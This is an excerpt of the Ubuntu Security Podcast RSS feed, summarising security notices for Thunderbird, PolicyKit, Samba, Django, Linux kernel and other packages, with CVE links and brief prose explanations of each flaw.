<li><a href="https://ubuntu.com/security/CVE-2021-43545">CVE-2021-43545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43543">CVE-2021-43543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43542">CVE-2021-43542</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43541">CVE-2021-43541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43539">CVE-2021-43539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43538">CVE-2021-43538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43537">CVE-2021-43537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43536">CVE-2021-43536</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4140">CVE-2021-4140</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4129">CVE-2021-4129</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>91.5</li>
<li>Usual web framework issues plus some TB specific ones
<ul>
<li>JS interpreter was enabled in composition window - so if an attacker
could exploit some other vuln to then be able to inject content into
the composition window could get code execution</li>
<li>Buffer overflow in Matrix chat client lib</li>
<li>Mishandling of PGP/MIME - would only look at signature on inner signed
message even if was contained in another signed message - so would show
whole message as valid</li>
</ul>
</li>
</ul>
<h3 id="usn-5248-1-thunderbird-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5248-1">USN-5248-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>45 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43546">CVE-2021-43546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4126">CVE-2021-4126</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44538">CVE-2021-44538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43528">CVE-2021-43528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38502">CVE-2021-38502</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22751">CVE-2022-22751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22748">CVE-2022-22748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22747">CVE-2022-22747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22745">CVE-2022-22745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22743">CVE-2022-22743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22742">CVE-2022-22742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22741">CVE-2022-22741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22740">CVE-2022-22740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22739">CVE-2022-22739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22738">CVE-2022-22738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22737">CVE-2022-22737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43656">CVE-2021-43656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43545">CVE-2021-43545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43543">CVE-2021-43543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43542">CVE-2021-43542</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43541">CVE-2021-43541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43539">CVE-2021-43539</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43538">CVE-2021-43538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43537">CVE-2021-43537</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43536">CVE-2021-43536</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43535">CVE-2021-43535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43534">CVE-2021-43534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38509">CVE-2021-38509</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38508">CVE-2021-38508</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38507">CVE-2021-38507</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38506">CVE-2021-38506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38504">CVE-2021-38504</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38503">CVE-2021-38503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38501">CVE-2021-38501</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38500">CVE-2021-38500</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38498">CVE-2021-38498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38497">CVE-2021-38497</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38496">CVE-2021-38496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-38495">CVE-2021-38495</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29991">CVE-2021-29991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29987">CVE-2021-29987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29982">CVE-2021-29982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29981">CVE-2021-29981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4140">CVE-2021-4140</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4129">CVE-2021-4129</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5249-1-usbview-vulnerability-08-52">[<a href="https://ubuntu.com/security/notices/USN-5249-1">USN-5249-1</a>] USBView vulnerability [08:52]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23220">CVE-2022-23220</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly configure policykit to enforce proper restrictions -
could allow a local user to execute arbitrary code by causing USBView to
load other modules</li>
<li>Future versions of USBView won&rsquo;t run as root</li>
</ul>
<h3 id="usn-5250-1-strongswan-vulnerability-09-59">[<a href="https://ubuntu.com/security/notices/USN-5250-1">USN-5250-1</a>] strongSwan vulnerability [09:59]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45079">CVE-2021-45079</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5252-1-usn-5252-2-policykit-vulnerability-10-06">[<a href="https://ubuntu.com/security/notices/USN-5252-1">USN-5252-1</a>, <a href="https://ubuntu.com/security/notices/USN-5252-2">USN-5252-2</a>] PolicyKit vulnerability [10:06]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4034">CVE-2021-4034</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandling of argv in pkexec</li>
<li>Normally, when an application runs, gets given argv + argc - argv[0] is
the name of the application and arguments follow that - BUT this is only
a convention - can fork/exec another binary and specify NULL argv</li>
<li>pkexec in that case would then try and parse arguments outside of the
valid argv array - generally env follows argv - so would process env as
argv</li>
<li>since pkexec is setuid root glibc sanitises env - BUT pkexec modifies
it&rsquo;s own argv when processing arguments - so ends up modifying env - with
a crafted env input can trick pkexec to modify it&rsquo;s own env to then
inject say a malicious <code>LD_PRELOAD</code> value to cause arbitrary code to be
executed as root</li>
<li>Great find by Qualys</li>
</ul>
<h3 id="usn-5226-1-systemd-vulnerability-13-50">[<a href="https://ubuntu.com/security/notices/USN-5226-1">USN-5226-1</a>] systemd vulnerability [13:50]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3997">CVE-2021-3997</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Uncontrolled recursion in systemd-tmpfiles - local user could create a
deeply nested directory structure, cause systemd-tmpfiles to overflow
it&rsquo;s own stack by recursively calling the same function over and over
again -&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-5193-2-x-dot-org-x-server-vulnerabilities-14-58">[<a href="https://ubuntu.com/security/notices/USN-5193-2">USN-5193-2</a>] X.Org X Server vulnerabilities [14:58]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4011">CVE-2021-4011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4009">CVE-2021-4009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4008">CVE-2021-4008</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-142/">Episode 142</a></li>
</ul>
<h3 id="usn-5247-1-vim-vulnerabilities-15-07">[<a href="https://ubuntu.com/security/notices/USN-5247-1">USN-5247-1</a>] Vim vulnerabilities [15:07]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4069">CVE-2021-4069</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4019">CVE-2021-4019</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3984">CVE-2021-3984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3974">CVE-2021-3974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3973">CVE-2021-3973</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption vulns when handling different files - DoS /
code execution</li>
<li>All found by fuzzing vim with ASan - participates in bug bounty - <a href="https://huntr.dev/bounties/disclose?target=https%3A%2F%2Fgithub.com%2Fvim%2Fvim&amp;validSearch=true">want some bug cash?</a></li>
</ul>
<h3 id="usn-5254-1-shadow-vulnerabilities-15-54">[<a href="https://ubuntu.com/security/notices/USN-5254-1">USN-5254-1</a>] shadow vulnerabilities [15:54]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-7169">CVE-2018-7169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12424">CVE-2017-12424</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5255-1-webkitgtk-vulnerabilities-16-03">[<a href="https://ubuntu.com/security/notices/USN-5255-1">USN-5255-1</a>] WebKitGTK vulnerabilities [16:03]</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-30984">CVE-2021-30984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30954">CVE-2021-30954</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30953">CVE-2021-30953</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30952">CVE-2021-30952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30951">CVE-2021-30951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30936">CVE-2021-30936</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30934">CVE-2021-30934</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5257-1-ldns-vulnerabilities-16-18">[<a href="https://ubuntu.com/security/notices/USN-5257-1">USN-5257-1</a>] ldns vulnerabilities [16:18]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-19861">CVE-2020-19861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19860">CVE-2020-19860</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5260-1-usn-5260-2-samba-vulnerabilities-16-19">[<a href="https://ubuntu.com/security/notices/USN-5260-1">USN-5260-1</a>, USN-5260-2] Samba vulnerabilities [16:19]</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0336">CVE-2022-0336</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43566">CVE-2021-43566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44142">CVE-2021-44142</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-44142">CVE-2021-44142</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most interesting vuln:
<ul>
<li>Heap OOB read/write in VFS fruit module - codeexec</li>
<li>Used to provide enhanced compatibility with Apple SMB clients and others</li>
<li>Not enabled by default but likely enabled in a bunch of different envs</li>
<li>Occurs when parsing extattr metadata - requires a user to be able to
modify a files xattrs but this is common in lots of envs</li>
</ul>
</li>
</ul>
<h3 id="usn-5259-1-cron-vulnerabilities-17-01">[<a href="https://ubuntu.com/security/notices/USN-5259-1">USN-5259-1</a>] Cron vulnerabilities [17:01]</h3>
<ul>
<li>4 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9706">CVE-2019-9706</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9705">CVE-2019-9705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9704">CVE-2019-9704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-9525">CVE-2017-9525</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-security-guide-tooling-released-for-disa-stig-compliance-17-11">Ubuntu Security Guide tooling released for DISA-STIG compliance [17:11]</h3>
<ul>
<li>
<p>DISA-STIG is a U.S. Department of Defense security configuration standard
consisting of configuration guidelines for hardening systems to improve a
system’s security posture.</p>
</li>
<li>
<p>It can be seen as a checklist for securing protocols, services, or
servers to improve the overall security by reducing the attack
surface.</p>
</li>
<li>
<p>The Ubuntu Security Guide (USG) brings simplicity by integrating the
experience of several teams working on compliance. It enables the audit,
fixing, and customisation of a system while enabling a system-wide
configuration for compliance, making management by diverse people in a
DevOps team significantly easier.</p>
</li>
<li>
<p>The DISA-STIG automated configuration tooling for Ubuntu 20.04 LTS is
available with Ubuntu Advantage subscriptions and Ubuntu Pro, alongside
additional open source security and support services.</p>
</li>
<li>
<p><a href="https://ubuntu.com/blog/ubuntu-introduces-the-ubuntu-security-guide-to-ease-disa-stig-compliance">https://ubuntu.com/blog/ubuntu-introduces-the-ubuntu-security-guide-to-ease-disa-stig-compliance</a></p>
</li>
<li>
<p><a href="https://ubuntu.com/advantage">https://ubuntu.com/advantage</a></p>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E147.mp3" length="15241759" type="audio/mpeg" /><itunes:duration>20:02</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 146
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-146/</link>
          <pubDate>Fri, 14 Jan 2022 17:54:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>06b1cc38e3413a738dde4b25d88180e0c49fba5c2507c4c5afc7b11d7735134636123caa31a76eeb3eeacfd9b43846fb01d560fe7a667d171928b95f41cf027d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 146</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Ubuntu 21.04 goes EOL soon, plus we cover security updates for Django, the Linux kernel, Apache httpd2 + Log4j2, Ghostscript and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>Ubuntu 21.04 goes EOL soon, plus we cover security updates for Django, the Linux kernel, Apache httpd2 + Log4j2, Ghostscript and more.</itunes:summary>
        <description>Ubuntu 21.04 goes EOL soon, plus we cover security updates for Django, the Linux kernel, Apache httpd2 + Log4j2, Ghostscript and more.</description>
        <googleplay:description>Ubuntu 21.04 goes EOL soon, plus we cover security updates for Django, the Linux kernel, Apache httpd2 + Log4j2, Ghostscript and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu 21.04 goes EOL soon, plus we cover security updates for Django, the Linux kernel, Apache httpd2 + Log4j2, Ghostscript and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>28 unique CVEs addressed</p>
<h3 id="usn-5204-1-django-vulnerabilities-00-45">[<a href="https://ubuntu.com/security/notices/USN-5204-1">USN-5204-1</a>] Django vulnerabilities [00:45]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45452">CVE-2021-45452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45116">CVE-2021-45116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45115">CVE-2021-45115</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible to write to arbitrary locations <strong>if</strong> a plugin etc would call
<code>Storage.save()</code> with crafted file names</li>
<li>Also possible to use the <code>dictsort</code> template filter to disclose info or
make method calls when passing in a crafted key - Django upstream remind
that should always validate user input before use</li>
<li>Possible DoS attack since the password comparison logic would compare
entire submitted password for similarity which (when passed a very long
password) would use a lot of CPU - fixed to discard anything with a
length that was significantly different than the supplied password</li>
</ul>
<h3 id="usn-5206-1-linux-kernel--oem--vulnerability-02-08">[<a href="https://ubuntu.com/security/notices/USN-5206-1">USN-5206-1</a>] Linux kernel (OEM) vulnerability [02:08]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.14 OEM kernel for Ubuntu 20.04 LTS</li>
<li>hugetlb would not always flush TLBs under certain conditions - since
don&rsquo;t get flushed, a local attacker could then possibly read or alter
stale data from other processes which are using huge pages
<ul>
<li>In general most processes don&rsquo;t use huge pages - have to specifically
opt in by using <code>mmap()</code> or SYSV shmem syscalls with the <code>SHM_HUGETLB</code> flag</li>
<li>But this is often used by applications which have large memory
requirements as they can preallocate memory using much larger page
sizes which gives performance benefits since many less TLB entries for
the same amount of memory compared to using standard size 4K pages</li>
</ul>
</li>
</ul>
<h3 id="usn-5207-1-linux-kernel--oem--vulnerabilities-04-26">[<a href="https://ubuntu.com/security/notices/USN-5207-1">USN-5207-1</a>] Linux kernel (OEM) vulnerabilities [04:26]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43267">CVE-2021-43267</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-42739">CVE-2021-42739</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4001">CVE-2021-4001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.10 OEM kernel for Ubuntu 20.04 LTS</li>
<li>huge pages tlb flushing issue above</li>
<li>Race-condition in handling of read-only maps in eBPF - could allow a
privileged attacker to modify maps that were meant to be read-only</li>
<li>2 vulns previously discussed in <a href="https://ubuntusecuritypodcast.org/episode-140/">Episode 140</a>
<ul>
<li><code>TIPC</code> + <code>MSG_CRYPTO</code> OOB write, and Firewire OOB write - both can be used
by local unprivileged users to cause DoS / possible code execution</li>
</ul>
</li>
</ul>
<h3 id="usn-5208-1-linux-kernel-vulnerabilities-06-01">[<a href="https://ubuntu.com/security/notices/USN-5208-1">USN-5208-1</a>] Linux kernel vulnerabilities [06:01]</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43267">CVE-2021-43267</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43056">CVE-2021-43056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41864">CVE-2021-41864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20321">CVE-2021-20321</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 kernel series for Ubuntu 21.10, 5.11 kernel series for Ubuntu 21.04,
5.11 HWE kernel series for Ubuntu 20.04 LTS</li>
<li>As above plus
<ul>
<li>overlayfs race-condition -&gt; DoS</li>
<li>NFS UAF -&gt; crash -&gt; DoS / code-exec</li>
<li>eBPF integer overflow -&gt; OOB write -&gt; crash -&gt; DoS / code-exec</li>
</ul>
</li>
</ul>
<h3 id="usn-5209-1-linux-kernel-vulnerabilities-06-38">[<a href="https://ubuntu.com/security/notices/USN-5209-1">USN-5209-1</a>] Linux kernel vulnerabilities [06:38]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41864">CVE-2021-41864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20321">CVE-2021-20321</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20317">CVE-2021-20317</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 kernel series for Ubuntu 20.04 LTS, 4.15 HWE kernel series for
Ubuntu 16.04 ESM, 4.15 kernel for Ubuntu 14.04 ESM on Azure</li>
<li>A bunch of the previously mentioned CVEs, plus:
<ul>
<li>race condition in timer impl -&gt; DoS from a privileged local users</li>
</ul>
</li>
</ul>
<h3 id="usn-5210-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5210-1">USN-5210-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43056">CVE-2021-43056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41864">CVE-2021-41864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20321">CVE-2021-20321</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26541">CVE-2020-26541</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 kernel series for Ubuntu 20.04 LTS, 5.4 HWE kernel series for Ubuntu
18.04 LTS</li>
<li>As above</li>
</ul>
<h3 id="usn-5211-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5211-1">USN-5211-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel series for Ubuntu 16.04 ESM, 3.13 kernel series for Ubuntu
14.04 ESM</li>
</ul>
<h3 id="usn-5219-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5219-1">USN-5219-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>Affecting Focal (20.04 LTS), Hirsute (21.04), Impish (21.10)</li>
<li>5.13 kernel series for Ubuntu 21.10, 5.11 kernel series for Ubuntu 21.04,
5.11 HWE kernel series for Ubuntu 20.04 LTS</li>
<li>eBPF ringbuf OOB write -&gt; local attacker -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5217-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5217-1">USN-5217-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4090">CVE-2021-4090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NFS OOB write -&gt; local attacker -&gt; DoS / RCE</li>
<li>eBPF ringbuf OOB write
<ul>
<li>same impact</li>
</ul>
</li>
</ul>
<h3 id="usn-5218-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5218-1">USN-5218-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-43389">CVE-2021-43389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43267">CVE-2021-43267</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43056">CVE-2021-43056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41864">CVE-2021-41864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3760">CVE-2021-3760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20321">CVE-2021-20321</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4002">CVE-2021-4002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 OEM kernel series for Ubuntu 20.04 LTS</li>
</ul>
<h3 id="lsn-0083-1-linux-kernel-vulnerability-07-33">[<a href="https://ubuntu.com/security/notices/LSN-0083-1">LSN-0083-1</a>] Linux kernel vulnerability [07:33]</h3>
<ul>
<li>5 CVEs addressed in Ubuntu 20.04 LTS, 18.04 LTS and 16.04 ESM
